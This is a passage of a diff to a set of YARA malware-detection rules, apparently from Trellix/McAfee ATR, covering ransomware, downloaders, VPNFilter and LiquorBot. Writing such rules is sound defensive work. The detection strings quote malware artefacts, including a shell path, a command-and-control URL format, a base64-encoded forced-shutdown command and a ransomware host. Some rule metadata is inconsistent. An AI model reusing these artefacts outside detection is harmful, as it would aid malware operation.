00 5F 00 43 00 4C 00 4F 00 53 00 45 00 5F 00 50 00 4E 00 47 00 32 00 49 00 44 00 52 00 5F 00 48 00 54 00 4D 00 5F 00 49 00 4D 00 47 00 5F 00 50 00 41 00 47 00 45 00 5F 00 54 00 49 00 54 00 4C 00 45 00 5F 00 49 00 43 00 4F 00 4E 00 5F 00 4D 00 45 00 4E 00 55 00 5F 00 50 00 41 00 49 00 44 00 5F 00 53 00 45 00 54 00 54 00 49 00 4E 00 47 00 53 00 5F 00 50 00 4E 00 47 00 }
-		$s7 = { 25 73 5C 6C 6F 67 5F 25 30 34 64 25 30 32 64 25 30 32 64 5F 25 64 2E 6C 6F 67 }
+		$variant2015_infmarker = "aCfG92KXpcSo4Y94BnUrFmnNk27EhW6CqP5EnT"
+		$variant2013_infmarker = "ad6af8bd5835d19cc7fdc4c62fdf02a1"
+		$variant2013_string = "%s?cstorage=shell&comp=%s"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 3000KB and all of them
+		uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 and 1 of ( $variant* )
 }
-rule TRELLIX_ARC_Ransomware_Coronavirus : RANSOMWARE FILE
+rule TRELLIX_ARC_Downloader_Darkmegi_Pdb : DOWNLOADER FILE
 {
 	meta:
-		description = "Rule to detect the Corona Virus ransomware"
+		description = "Rule to detect DarkMegi downloader based on PDB"
 		author = "Marc Rivero | McAfee ATR Team"
-		id = "4195a57b-cd51-5050-861a-6436f7ec4eca"
-		date = "2020-03-25"
+		id = "3ccc3685-e05b-5620-9198-24733fb1e7eb"
+		date = "2013-03-06"
 		modified = "2020-08-14"
-		reference = "https://twitter.com/malwrhunterteam/status/1238056503493505024"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_coronavirus.yar#L43-L80"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkmegi"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/malware/MALW_downloader_darkmegi.yar#L1-L25"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		hash = "3299f07bc0711b3587fe8a1c6bf3ee6bcbc14cb775f64b28a61d72ebcb8968d3"
-		logic_hash = "2a7e1676a20f30b0cb0321579bb85e4836e2aee5f56b838d2ff2bec7a08c489f"
+		hash = "bf849b1e8f170142176d2a3b4f0f34b40c16d0870833569824809b5c65b99fc1"
+		logic_hash = "47faf8c5296e651f82726a6e8a7843dfa0f98e7be7257d2c03efcff550f52140"
 		score = 75
-		quality = 64
-		tags = "RANSOMWARE, FILE"
+		quality = 70
+		tags = "DOWNLOADER, FILE"
 		rule_version = "v1"
-		malware_type = "ransomware"
-		malware_family = "Ransom:W32/CoronaVirus"
+		malware_type = "downloader"
+		malware_family = "Downloader:W32/DarkMegi"
 		actor_type = "Cybercrime"
 		actor_group = "Unknown"
 
 	strings:
-		$s1 = { 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 }
-		$s2 = { 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 }
-		$s3 = { 2F 00 75 00 70 00 6C 00 6F 00 61 00 64 00 2F 00 25 00 73 00 5F 00 25 00 64 00 5F 00 25 00 73 00 }
-		$s4 = { 53 59 53 54 45 4D 5C 43 75 72 72 65 6E 74 43 6F 6E 74 72 6F 6C 53 65 74 5C 43 6F 6E 74 72 6F 6C 5C 53 65 73 73 69 6F 6E 20 4D 61 6E 61 67 65 72 }
-		$s5 = { 5C 5C 2E 5C 50 68 79 73 69 63 61 6C 44 72 69 76 65 25 64 }
+		$pdb = "\\RKTDOW~1\\RKTDRI~1\\RKTDRI~1\\objchk\\i386\\RktDriver.pdb"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 100KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize > 20000KB and any of them
 }
-rule TRELLIX_ARC_Amba_Ransomware : RANSOMWARE FILE
+rule TRELLIX_ARC_Vpnfilter : BACKDOOR FILE
 {
 	meta:
-		description = "Rule to detect Amba Ransomware"
-		author = "Marc Rivero | McAfee ATR Team"
-		id = "961f2892-e462-55e4-bd96-7dff895cb1e6"
-		date = "2017-07-03"
+		description = "Filter for 2nd stage malware used in VPNfilter attack"
+		author = "Christiaan Beek @ McAfee Advanced Threat Research"
+		id = "89bd7f94-d73c-5c5c-a3ec-0331f79e61fd"
+		date = "2018-05-23"
 		modified = "2020-08-14"
-		reference = "https://www.enigmasoftware.com/ambaransomware-removal/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_amba.yar#L1-L41"
+		reference = "https://blog.talosintelligence.com/2018/05/VPNFilter.html"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/malware/MALW_VPNfilter.yar#L1-L40"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		hash = "b9b6045a45dd22fcaf2fc13d39eba46180d489cb4eb152c87568c2404aecac2f"
-		logic_hash = "0830ab49956711d3e6ad64785edcf54146a24756c4ab66384305dc18091867bd"
+		hash = "9eb6c779dbad1b717caa462d8e040852759436ed79cc2172692339bc62432387"
+		logic_hash = "88f08765dff632f0c08e985181309e5c3ac9cdaa51d05d8485c411fb1a183cca"
 		score = 75
-		quality = 68
-		tags = "RANSOMWARE, FILE"
+		quality = 70
+		tags = "BACKDOOR, FILE"
 		rule_version = "v1"
-		malware_type = "ransomware"
-		malware_family = "Ransom:W32/Amba"
+		malware_type = "backdoor"
+		malware_family = "Backdoor:W32/VPNfilter"
 		actor_type = "Cybercrime"
 		actor_group = "Unknown"
 
 	strings:
-		$s1 = "64DCRYPT.SYS" fullword wide
-		$s2 = "32DCRYPT.SYS" fullword wide
-		$s3 = "64DCINST.EXE" fullword wide
-		$s4 = "32DCINST.EXE" fullword wide
-		$s5 = "32DCCON.EXE" fullword wide
-		$s6 = "64DCCON.EXE" fullword wide
-		$s8 = "32DCAPI.DLL" fullword wide
-		$s9 = "64DCAPI.DLL" fullword wide
-		$s10 = "ICYgc2h1dGRvd24gL2YgL3IgL3QgMA==" fullword ascii
-		$s11 = "QzpcVXNlcnNcQUJDRFxuZXRwYXNzLnR4dA==" fullword ascii
-		$s12 = ")!pssx}v!pssx}v))!pssx}v!pssx}v))!pssx}v!pssx}v))!pssx}v!pssx}v))!pssx}v!pssx}v))!pssx}v!pssx}v))!pssx}v!pssx}v)" fullword ascii
-		$s13 = "RGVmcmFnbWVudFNlcnZpY2U="
-		$s14 = "LWVuY3J5cHQgcHQ5IC1wIA=="
-		$s15 = "LWVuY3J5cHQgcHQ3IC1wIA=="
-		$s16 = "LWVuY3J5cHQgcHQ2IC1wIA=="
-		$s17 = "LWVuY3J5cHQgcHQzIC1wIA=="
+		$s1 = "id-at-postalAddress" fullword ascii
+		$s2 = "/bin/shell" fullword ascii
+		$s3 = "/DZrtenNLQNiTrM9AM+vdqBpVoNq0qjU51Bx5rU2BXcFbXvI5MT9TNUhXwIDAQAB" fullword ascii
+		$s4 = "Usage does not match the keyUsage extension" fullword ascii
+		$s5 = "id-at-postalCode" fullword ascii
+		$s6 = "vTeY4KZMaUrveEel5tWZC94RSMKgxR6cyE1nBXyTQnDOGbfpNNgBKxyKbINWoOJU" fullword ascii
+		$s7 = "id-ce-extKeyUsage" fullword ascii
+		$s8 = "/f8wYwYDVR0jBFwwWoAUtFrkpbPe0lL2udWmlQ/rPrzH/f+hP6Q9MDsxCzAJBgNV" fullword ascii
+		$s9 = "/etc/config/hosts" fullword ascii
+		$s10 = "%s%-18s: %d bits" fullword ascii
+		$s11 = "id-ce-keyUsage" fullword ascii
+		$s12 = "Machine is not on the network" fullword ascii
+		$s13 = "No XENIX semaphores available" fullword ascii
+		$s14 = "No CSI structure available" fullword ascii
+		$s15 = "Name not unique on network" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 3000KB and ( 8 of them ) ) or ( all of them )
+		( uint16( 0 ) == 0x457f and filesize < 500KB and ( 8 of them ) ) or ( all of them )
 }
-rule TRELLIX_ARC_Loocipher_Ransomware : RANSOMWARE FILE
+rule TRELLIX_ARC_Rovnix_Downloader : DOWNLOADER
 {
 	meta:
-		description = "Rule to detect Loocipher ransomware"
-		author = "Marc Rivero | McAfee ATR Team"
-		id = "d18efe09-4b04-5089-84f8-aead63fc19bb"
-		date = "2019-12-05"
+		description = "Rovnix downloader with sinkhole checks"
+		author = "Intel Security"
+		id = "d51f8f73-7a3a-5ccf-9122-86061b5399f1"
+		date = "2025-06-01"
 		modified = "2020-08-14"
-		reference = "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/analysis-of-loocipher-a-new-ransomware-family-observed-this-year/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_Loocipher.yar#L1-L46"
+		reference = "https://blogs.mcafee.com/mcafee-labs/rovnix-downloader-sinkhole-time-checks/"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/malware/MALW_Rovnix.yar#L1-L38"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		hash = "7720aa6eb206e589493e440fec8690ceef9e70b5e6712a9fec9208c03cac7ff0"
-		logic_hash = "36e452c34fd9bbb521f5422bffdbb71991de66f3faa29292dc3f27c8d7e1f9ba"
+		logic_hash = "52cde40c95436129b7d48b4bd5e78b66deb84fdc84a76cc9ac72f24e0777e540"
 		score = 75
-		quality = 70
-		tags = "RANSOMWARE, FILE"
-		rule_version = "v1"
-		malware_type = "ransomware"
-		malware_family = "Ransom:W32/Loocipher"
+		quality = 43
+		tags = "DOWNLOADER"
+		malware_type = "downloader"
+		malware_family = "Downloader:W32/Rovnix"
 		actor_type = "Cybercrime"
 		actor_group = "Unknown"
 
 	strings:
-		$x1 = "c:\\users\\usuario\\desktop\\cryptolib\\gfpcrypt.h" fullword ascii
-		$x2 = "c:\\users\\usuario\\desktop\\cryptolib\\eccrypto.h" fullword ascii
-		$s3 = "c:\\users\\usuario\\desktop\\cryptolib\\gf2n.h" fullword ascii
-		$s4 = "c:\\users\\usuario\\desktop\\cryptolib\\queue.h" fullword ascii
-		$s5 = "ThreadUserTimer: GetThreadTimes failed with error " fullword ascii
-		$s6 = "std::_Vector_const_iterator<class std::_Vector_val<struct std::_Simple_types<struct CryptoPP::ProjectivePoint> > >::operator *" fullword wide
-		$s7 = "std::_Vector_const_iterator<class std::_Vector_val<struct std::_Simple_types<struct CryptoPP::ProjectivePoint> > >::operator +=" fullword wide
-		$s8 = "std::basic_string<unsigned short,struct std::char_traits<unsigned short>,class std::allocator<unsigned short> >::operator []" fullword wide
-		$s9 = "std::vector<struct CryptoPP::ProjectivePoint,class std::allocator<struct CryptoPP::ProjectivePoint> >::operator []" fullword wide
-		$s10 = "std::_Vector_const_iterator<class std::_Vector_val<struct std::_Simple_types<class CryptoPP::Integer> > >::operator *" fullword wide
-		$s11 = "std::_Vector_const_iterator<class std::_Vector_val<struct std::_Simple_types<class CryptoPP::Integer> > >::operator +=" fullword wide
-		$s12 = "std::vector<struct CryptoPP::WindowSlider,class std::allocator<struct CryptoPP::WindowSlider> >::operator []" fullword wide
-		$s13 = "std::istreambuf_iterator<char,struct std::char_traits<char> >::operator ++" fullword wide
-		$s14 = "std::istreambuf_iterator<char,struct std::char_traits<char> >::operator *" fullword wide
-		$s15 = "std::_Vector_const_iterator<class std::_Vector_val<struct std::_Simple_types<struct CryptoPP::ProjectivePoint> > >::_Compat" fullword wide
-		$s16 = "std::vector<class CryptoPP::PolynomialMod2,class std::allocator<class CryptoPP::PolynomialMod2> >::operator []" fullword wide
-		$s17 = "DL_ElgamalLikeSignatureAlgorithm: this signature scheme does not support message recovery" fullword ascii
-		$s18 = "std::vector<struct CryptoPP::ECPPoint,class std::allocator<struct CryptoPP::ECPPoint> >::operator []" fullword wide
-		$s19 = "std::vector<struct CryptoPP::EC2NPoint,class std::allocator<struct CryptoPP::EC2NPoint> >::operator []" fullword wide
-		$s20 = "std::_Vector_const_iterator<class std::_Vector_val<struct std::_Simple_types<class CryptoPP::Integer> > >::_Compat" fullword wide
+		$sink1 = "control"
+		$sink2 = "sink"
+		$sink3 = "hole"
+		$sink4 = "dynadot"
+		$sink5 = "block"
+		$sink6 = "malw"
+		$sink7 = "anti"
+		$sink8 = "googl"
+		$sink9 = "hack"
+		$sink10 = "trojan"
+		$sink11 = "abuse"
+		$sink12 = "virus"
+		$sink13 = "black"
+		$sink14 = "spam"
+		$boot = "BOOTKIT_DLL.dll"
+		$mz = { 4D 5A }
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 17000KB and ( 1 of ( $x* ) and 4 of them ) ) or ( all of them )
+		$mz in ( 0 .. 2 ) and all of ( $sink* ) and $boot
 }
-rule TRELLIX_ARC_Shrug2_Ransomware : RANSOMWARE FILE
+rule TRELLIX_ARC_MALW_Liquorbot : MALWARE FILE
 {
 	meta:
-		description = "Rule to detect the Shrug Ransomware"
-		author = "McAfee ATR Team"
-		id = "34e59296-db7c-551b-8d48-ffea20f2b4bb"
-		date = "2018-07-12"
-		modified = "2020-10-12"
-		reference = "https://blogs.quickheal.com/new-net-ransomware-shrug2/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_shrug2.yar#L1-L30"
+		description = "Rule to detect LiquorBot malware"
+		author = "Marc Rivero | McAfee ATR Team"
+		id = "73898df8-b5eb-50ac-a2fe-ef9233c251c5"
+		date = "2020-08-19"
+		modified = "2020-08-19"
+		reference = "https://github.com/advanced-threat-research/Yara-Rules/"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/malware/MALW_liquorbot.yar#L1-L23"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		hash = "c89833833885bafdcfa1c6ee84d7dbcf2389b85d7282a6d5747da22138bd5c59"
-		logic_hash = "8c817b7fc4a0eada08b3d298c94b99a85c4e5a49a49d1c3fabdb0c6bbf56676b"
+		logic_hash = "2448e3ede809331b2370fe9d42d603ad6508be6531a1a8764e0e0621867b6e89"
 		score = 75
-		quality = 20
-		tags = "RANSOMWARE, FILE"
+		quality = 70
+		tags = "MALWARE, FILE"
 		rule_version = "v1"
-		malware_type = "ransomware"
-		malware_family = "Ransom:W32/Shrug"
+		malware_type = "malware"
+		malware_family = "Botnet:W32/LiquorBot"
 		actor_type = "Cybercrime"
 		actor_group = "Unknown"
+		hash1 = "5b2a9cbda99ed903f75c3b37f0a6b1b9f6c39671a76ed652f3ddba117fd43bc9"
 
 	strings:
-		$s1 = "C:\\Users\\Gamer\\Desktop\\Shrug2\\ShrugTwo\\ShrugTwo\\obj\\Debug\\ShrugTwo.pdb" fullword ascii
-		$s2 = "http://tempacc11vl.000webhostapp.com/" fullword wide
-		$s3 = "Shortcut for @ShrugDecryptor@.exe" fullword wide
-		$s4 = "C:\\Users\\" fullword wide
-		$s5 = "http://clients3.google.com/generate_204" fullword wide
-		$s6 = "\\Desktop\\@ShrugDecryptor@.lnk" fullword wide
+		$pattern = { 7F454C4602010100000000000000000002003E0001000000605A4600000000004000000000000000700200000000000000000000400038000A0040001B00090006000000040000004000000000000000400040000000000040004000000000003002000000000000300200000000000000100000000000000300000004000000E00F000000000000E00F400000000000E00F40000000000020000000000000002000000000000000010000000000000004000000040000007C0F0000000000007C0F4000000000007C0F400000000000640000000000000064000000000000000400000000000000010000000500000000000000000000000000400000000000000040000000000040FB29000000000040FB2900000000000010000000000000010000000400000000002A000000000000006A000000000000006A0000000000E4492C0000000000E4492C000000000000100000000000000100000006000000005056000000000000509600000000000050960000000000E014040000000000681307000000000000100000000000000200000006000000405156000000000040519600000000004051960000000000300100000000000030010000000000000800000000000000070000000400000000000000000000000000000000000000000000000000000000000000000000000800000000000000080000000000000051E574640600000000000000000000000000000000000000000000000000000000000000000000000000000000000000080000000000000080150465002A00000000000000000000000000000000000000000000000000000000000000000000000000000000000008000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000010000000600000000000000001040000000000000100000000000001FE9290000000000000000000000000010000000000000000000000000000000F000000001000000060000000000000020F969000000000020F929000000000020020000000000000000000000000000100000000000000010000000000000007000000001000000020000000000000000006A000000000000002A0000000000A678110000000000000000000000000020000000000000000000000000000000E0000000040000000200000000000000A8787B0000000000A8783B000000000018000000000000000B0000000000000008000000000000001800000000000000E6000000040000000200000000000000C0787B0000000000C0783B000000000018030000000000000B0000000200000008000000000000001800000000000000F5000000FF }
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 2000KB ) and all of them
+		uint16( 0 ) == 0x457f and all of them
 }
-rule TRELLIX_ARC_Nefilim_Ransomware : RANSOMWARE FILE
+rule TRELLIX_ARC_Rietspoof_Loader : RANSOMWARE FILE
 {
 	meta:
-		description = "Rule to detect Nefilim ransomware"
+		description = "Rule to detect the Rietspoof loader"
 		author = "Marc Rivero | McAfee ATR Team"
-		id = "55d9cb20-5071-5dce-a46f-a20816ba379f"
-		date = "2020-03-17"
